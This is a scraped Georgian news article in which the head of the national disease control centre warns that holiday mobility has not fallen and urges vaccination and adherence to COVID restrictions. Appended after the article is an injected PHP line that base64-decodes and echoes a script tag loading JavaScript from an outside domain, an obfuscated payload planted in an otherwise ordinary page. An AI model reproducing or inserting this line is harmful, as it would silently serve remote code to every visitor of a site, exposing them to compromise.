celsiusi
ავერსი საქკაბელი

დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ განაცხადა,რომ უქმე დღეების მიუხედავად, არაა შემცირებული მობილობა. 

 
„სამწუხაროდ, არ არის შემცირებული მობილობა, მიუხედავად იმისა, რომ უქმე დღეებია და გარკვეული შეზღუდვები დღესასწაულებზე გვქონდა. ასე რომ, დანის პირზე გავდივართ ახლა, რომ არ მივიღოთ ძლიერი ნახტომისებური ეპიდაფეთქება. ამისთვის აუცილებელია, ყველამ გავითავისოთ, რომ სერიოზულია ეპიდსიტუაცია და უნდა დავიცვათ ყველა რეკომენდაცია, მეტად დავაჩქაროთ ვაქცინაცია“, – განაცხადა ამირან გამყრელიძემ. 
 
რაც შეეხება შეზღუდვების გახანგრძლივების საკითხს, ამირან გამყრელიძის თქმით, აკვირდებიან სიტუაციას. 
 
„ვნახოთ, დავაკვირდეთ. ალბათ, სამშაბათს ან ოთხშაბათს ჩატარდება საკოორდინაციო საბჭო. მოგეხსენებათ, ამ გადაწყვეტილებას სწორედ საბჭო იღებს. არ მგონია, ახლა სიტუაცია მართვადია. კი არის ზეწოლა ჯანდაცვის სისტემაზე, მაგრამ ჯანდაცვის სისტემას საკმაო გამოცდილება აქვს მიღებული და უძლებს ამ ზეწოლას. ყველა ერთად თუ დავიცავთ წესებსა და რეკომენდაციებს, მაშინ დამატებითი შეზღუდვები არ გვინდა. როგორმე მაისი უნდა გავიაროთ ამ ფარგლებში და არ მივცეთ ბიძგი ეპიდსიტუაციის კიდევ უფრო მეტად გაუარესებას“, – განუცხადა საქართველოს პირველ არხს ამირან გამყრელიძემ.
 
 
1119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");